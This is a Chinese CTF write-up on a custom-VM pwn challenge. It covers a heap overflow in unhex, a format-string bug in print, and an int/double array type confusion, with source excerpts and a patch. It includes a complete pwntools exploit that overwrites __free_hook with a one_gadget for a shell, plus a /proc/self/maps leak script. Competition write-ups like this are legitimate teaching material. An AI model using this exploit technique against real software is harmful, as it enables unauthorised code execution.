<INITIAL>"+="           return ADD_ASSIGN_T;
<INITIAL>"-="           return SUB_ASSIGN_T;
<INITIAL>"*="           return MUL_ASSIGN_T;
<INITIAL>"/="           return DIV_ASSIGN_T;
<INITIAL>"%="           return MOD_ASSIGN_T;
<INITIAL>"++"           return INCREMENT;
<INITIAL>"--"           return DECREMENT;
<INITIAL>"!"            return EXCLAMATION;
<INITIAL>"."            return DOT;
<INITIAL>[A-Za-z_][A-Za-z_0-9]* {
    yylval.identifier = prt_create_identifier(yytext);
    return IDENTIFIER;
}
<INITIAL>[0-9][0-9]* {
    Expression  *expression = prt_alloc_expression(INT_EXPRESSION);
    sscanf(yytext, "%d", &expression->u.int_value);
    yylval.expression = expression;
    return INT_LITERAL;
}
<INITIAL>0[xX][0-9A-Fa-f]+ {
    Expression  *expression = prt_alloc_expression(INT_EXPRESSION);
    // printf("Val: %d\n", expression->u.int_value);
    sscanf(yytext, "%x", &expression->u.int_value);
    yylval.expression = expression;
    return INT_LITERAL;
}
<INITIAL>[0-9]+\.[0-9]+ {
    Expression  *expression = prt_alloc_expression(DOUBLE_EXPRESSION);
    sscanf(yytext, "%lf", &expression->u.double_value);
    yylval.expression = expression;
    return DOUBLE_LITERAL;
}
<INITIAL>\" {
    prt_open_string_literal();
    BEGIN STRING_LITERAL_STATE;
}
<INITIAL>[ \t] ;
<INITIAL>[ \t\r\n] {increment_line_number();}
<INITIAL>"/*"     BEGIN C_COMMENT;
<INITIAL>"//"     BEGIN CC_COMMENT;
<INITIAL>.      {
    prt_compile_error(prt_get_current_compiler()->current_line_number,
                      CHARACTER_INVALID_ERR,
                      CHARACTER_MESSAGE_ARGUMENT, "bad_char", yytext[0],
                      MESSAGE_ARGUMENT_END);
}
<C_COMMENT>\n     increment_line_number();
<C_COMMENT>"*/"     {
    BEGIN INITIAL;
}
<C_COMMENT>.      ;
<CC_COMMENT>\n  {
    increment_line_number();
    BEGIN INITIAL;
}
<CC_COMMENT>.   ;
<STRING_LITERAL_STATE>\"        {
    Expression *expression = prt_alloc_expression(STRING_EXPRESSION);
    expression->u.string_value = prt_close_string_literal();
    yylval.expression = expression;
    BEGIN INITIAL;
    return STRING_LITERAL;
}
<STRING_LITERAL_STATE>\n        {
    prt_add_string_literal('\n');
    increment_line_number();
}
<STRING_LITERAL_STATE>\\\"      prt_add_string_literal('"');
<STRING_LITERAL_STATE>\\n       prt_add_string_literal('\n');
<STRING_LITERAL_STATE>\\t       prt_add_string_literal('\t');
<STRING_LITERAL_STATE>\\\\      prt_add_string_literal('\\');
<STRING_LITERAL_STATE>.         {
    Encoding enc = prt_get_current_compiler()->source_encoding;
    prt_add_string_literal(yytext[0]);
    if (enc == SHIFT_JIS_ENCODING
        && ((((unsigned char*)yytext)[0] >= 0x81
             && ((unsigned char*)yytext)[0] <= 0x9e)
            || (((unsigned char*)yytext)[0] >= 0xe0
                && ((unsigned char*)yytext)[0] <= 0xef))) {
        BEGIN SHIFT_JIS_2ND_CHAR;
    }
}
<SHIFT_JIS_2ND_CHAR>. {
    prt_add_string_literal(yytext[0]);
    BEGIN STRING_LITERAL_STATE;
}
%%

patch漏洞

说来惭愧，只修了这个洞

就是把pvm/native.c里的nv_lnk_proc函数：

if(wcsstr(dst, L"flag") != NULL){
            printf("no way \n");
            return ret;
        }

改成：

if(wcsstr(src, L"flag") != NULL){
            printf("no way \n");
            return ret;
        }

检查源文件的路径是否包含flag字样来杜绝flag文件被lnk到/tmp目录下

unhex

poc：

1 2	string unhex(string s); unhex("aaaa(超级多a)");

这个可以堆溢出，但是没想到怎么利用上，最后没写出exp，漏洞对应源代码中的：

// pvm/native.c
static PVM_Value
nv_unhex_proc(PVM_VirtualMachine *pvm,
              int arg_count, PVM_Value *args){
    PVM_Value ret;
    ret.object = malloc(sizeof(PVM_Object));
    ret.object->u.string.string = NULL_STRING;
    DBG_assert(arg_count == 1, ("arg_count..%d", arg_count));
    PVM_Char* input_String = NULL_STRING;
    char* unhex_string = NULL;
    if(args[0].object == NULL){
        input_String = NULL_STRING;
        return ret;
    } else{
        input_String = args[0].object->u.string.string;
    }
    if(input_String == NULL_STRING){
        return ret;
    }else{
        char* hex_string = malloc(1024);		// 只申请了1024的大小，但是没有对input_string的长度进行check
        memset(hex_string, 0, 1024);
        pvm_wcstombs(input_String, hex_string);
        hexs2bin(hex_string, &unhex_string);
    }
    wchar_t *wresult = NULL;
    wresult = pvm_mbstowcs_noenc(unhex_string);
    ret.object->u.string.string = wresult;
    return ret;
}

print

喜闻乐见的格式化字符串漏洞，poc：

1 2	string print(string s); print("%p-%p");

漏洞点的源代码在：

// pvm/native.c
static PVM_Value
nv_print_proc(PVM_VirtualMachine *pvm,
              int arg_count, PVM_Value *args)
{
    PVM_Value ret;
    PVM_Char *str;

    ret.int_value = 0;

    DBG_assert(arg_count == 1, ("arg_count..%d", arg_count));

    if (args[0].object == NULL) {
        str = NULL_STRING;
    } else {
        str = args[0].object->u.string.string;
    }
    pvm_print_wcs(stdout, str);			// 跟进
    fflush(stdout);

    return ret;
}

share/wchar.c

int
pvm_print_wcs(FILE *fp, wchar_t *str)
{
    char *tmp;
    int mb_len;
    int result;

    mb_len = pvm_wcstombs_len(str);
    MEM_check_all_blocks();
    tmp = MEM_malloc(mb_len + 1);
    pvm_wcstombs(str, tmp);
    result = fprintf(fp, tmp);		// 这里，正确的写法应该是fprintf(fp, "%s",tmp);
    MEM_free(tmp);

    return result;
}

但是由于程序没有读取我们后续输入的操作，所以这个漏洞也没利用成功，有点可惜

type confusion

类型混淆

由tr3e学长发现，orz

poc：

string hex(int x);
double[] max(int[] x, int[] x);
int print(string fmt);
int d2u(double x);

int [] victim = new int[1024];

double[] a = max(victim, victim);

print(hex(d2u(a[1023])));

因为类型混淆了，所以导致了越界读写，原本int是4字节的，而double是8字节的，可操作的空间足足大了两倍，为后续利用起到了至关重要的作用

原因应该是：

// compiler/generate.c
static void
generate_assign_expression(PVM_Executable *exe, Block *block,
                           Expression *expr, OpcodeBuf *ob,
                           PVM_Boolean is_toplevel)
{
    if (expr->u.assign_expression.operator != NORMAL_ASSIGN) {
        generate_expression(exe, block, 
                            expr->u.assign_expression.left, ob);
    }
    generate_expression(exe, block, expr->u.assign_expression.operand, ob);

    switch (expr->u.assign_expression.operator) {
    case NORMAL_ASSIGN : /* FALLTHRU */
        break;
    case ADD_ASSIGN:
        generate_code(ob, expr->line_number,
                      PVM_ADD_INT
                      + get_opcode_type_offset(expr->type));
        break;
    case SUB_ASSIGN:
        generate_code(ob, expr->line_number,
                      PVM_SUB_INT
                      + get_opcode_type_offset(expr->type));
        break;
    case MUL_ASSIGN:
        generate_code(ob, expr->line_number,
                      PVM_MUL_INT
                      + get_opcode_type_offset(expr->type));
        break;
    case DIV_ASSIGN:
        generate_code(ob, expr->line_number,
                      PVM_DIV_INT
                      + get_opcode_type_offset(expr->type));
        break;
    case MOD_ASSIGN:
        generate_code(ob, expr->line_number,
                      PVM_MOD_INT
                      + get_opcode_type_offset(expr->type));
        break;
    default:
        DBG_assert(0, ("operator..%d\n", expr->u.assign_expression.operator));
    }

    if (!is_toplevel) {
        generate_code(ob, expr->line_number, PVM_DUPLICATE);
    }
    generate_pop_to_lvalue(exe, block,
                           expr->u.assign_expression.left, ob);
}

generate_assign_expression没有对数组的赋值进行check，还有一个就是编译器允许int转换成double，double可以转换成一个包含两个元素的int数组：

// pvm/native.c 没错还是这个文件，感觉漏洞都是出现在这几个内置的函数上
static PVM_Value
nv_d2u_proc(PVM_VirtualMachine *pvm,
              int arg_count, PVM_Value *args){
    PVM_Value ret;
    ret.object = malloc(sizeof(PVM_Object));
    DBG_assert(arg_count == 1, ("arg_count..%d", arg_count));
    union valUnion{
        double val;
        struct {
            int low;
            int high;
        }ints;
    }vals;

    if(args[0].double_value){
        vals.val = args[0].double_value;
        ret.object = PVM_create_array_int(pvm, 2); 
        ret.object->u.array.u.int_array[0] = vals.ints.low;
        ret.object->u.array.u.int_array[1] = vals.ints.high;
        return ret;
    }else{
        return ret;
    }
}
static PVM_Value
nv_max_proc(PVM_VirtualMachine *pvm,
              int arg_count, PVM_Value *args){
    
    PVM_Value ret;
    DBG_assert(arg_count == 2, ("arg_count..%d", arg_count));
    double number1 = args[0].double_value;
    double number2 = args[1].double_value;
    if(number1 >= number2){
        ret.double_value = number1;
    }else{
        ret.double_value = number2;
    }
    return ret;
}

可以看到都没有进行检查，所以强制类型转换的时候导致了类型混淆

exp：

from pwn import *

context.arch='amd64'
context.log_level='debug'

def debug(addr1,addr2,PIE=True):
	if PIE:
		text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
		gdb.attach(p,'b *{}\nb *{}'.format(hex(text_base+addr1),hex(text_base+addr2)))
	else:
		gdb.attach(p,"b *{}".format(hex(addr)))

def main(host,port=23548):
	global p
	if host:
		p=remote(host,port)
	else:
		# p=process("./pwn")
		p = process("./pwn",env={"LD_PRELOAD":"./libc-2.27.so"})
		# gdb.attach(p)
		debug(0x0000000000074B7,0x0000000000159D2)
	code = """string hex(int x);
double[] max(int[] x, int[] x);
int print(string fmt);
double d2u(int [] x);
int [] victim = new int[0x800000];

double[] c = max(victim, victim);
double libc_addr = c[5182463]+0.000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000934673;
c[5183765] = libc_addr;
"""
	p.recvuntil("size: ")
	p.sendline(str(len(code)+2))
	p.recvuntil("Give me your script(same size): ")
	p.sendline(code)
	p.interactive()

if __name__ == '__main__':
	# libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
	# main("123.57.209.176")
	
	main(args["REMOTE"])

这是我在Ubuntu18.04下利用的脚本，其中offset和数组的下标要根据字节的情况调整，这里说一下，数组的下标5182463是libc got表里的一个函数，下标5183765是__free_hook的位置，但是有个很坑的点，本地和远程的地址分布不一样，还好以前踩过，比赛的时候顺利解决。

解决本地和远程地址分布不一样

本地：

]

远程：

]

怎么读的呢，直接读/proc/self/maps，算好偏移，再打过去的时候成功。

读/proc/self/maps确定远程地址映射情况的代码：

string readfile(string filename);
int print(string fmt);
int [] victim = new int[0x800000];
print(readfile("/proc/self/maps"));

修改后的exp：

	offset = 4709653   
	code = """string hex(int x);
double[] max(int[] x, int[] x);
int print(string fmt);
double d2u(int [] x);
int [] victim = new int[0x800000];

double[] c = max(victim, victim);
double libc_addr = c[%d]+0.000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000934673;
c[%d] = libc_addr;
"""%(offset-1302,offset)

然后就是说一下为什么要申请一个0x800000大小的int数组，这是为了让这个数组mmap在libc上方，和libc的偏移固定，这样我们类型混淆后可以越界读写libc的数据来劫持程序流程，exp用的方法是改了__free_hook为one_gadget来getshell的

踩坑

最最后说一下那一堆0.00000是在干嘛，程序只有两种基本类型，int和double，和JavaScript很像，所以我们输入的int会被转为double，这点很蛋疼，因为这样直接加偏移的话被转换成double之后会出现误差，当时一度卡在这里，最后通过阅读源码：

// compiler/proto.l
<INITIAL>[0-9]+\.[0-9]+ {
    Expression  *expression = prt_alloc_expression(DOUBLE_EXPRESSION);
    sscanf(yytext, "%lf", &expression->u.double_value);
    yylval.expression = expression;
    return DOUBLE_LITERAL;
}

我们可以看到用的是sscanf的%lf来处理浮点数的，然后再看那个正则：

1	<INITIAL>[0-9]+\.[0-9]+

代表程序只认0.1123这种类型的浮点数，连带个负号都不行，所以我们上面exp里找的libc got表里的函数的地址要比one_gadget的地址低，这样才能用相加的办法来得到one_gadget

根据这个转换的结果：

>>> import struct
>>> from pwn import *
>>> offset = 0x11223
>>> struct.unpack("<d",p64(offset))
(3.4673e-319,)
>>>

我们得把3.4673e-319改成0.00000....00034673这样的形式。

总结

这题出的真的棒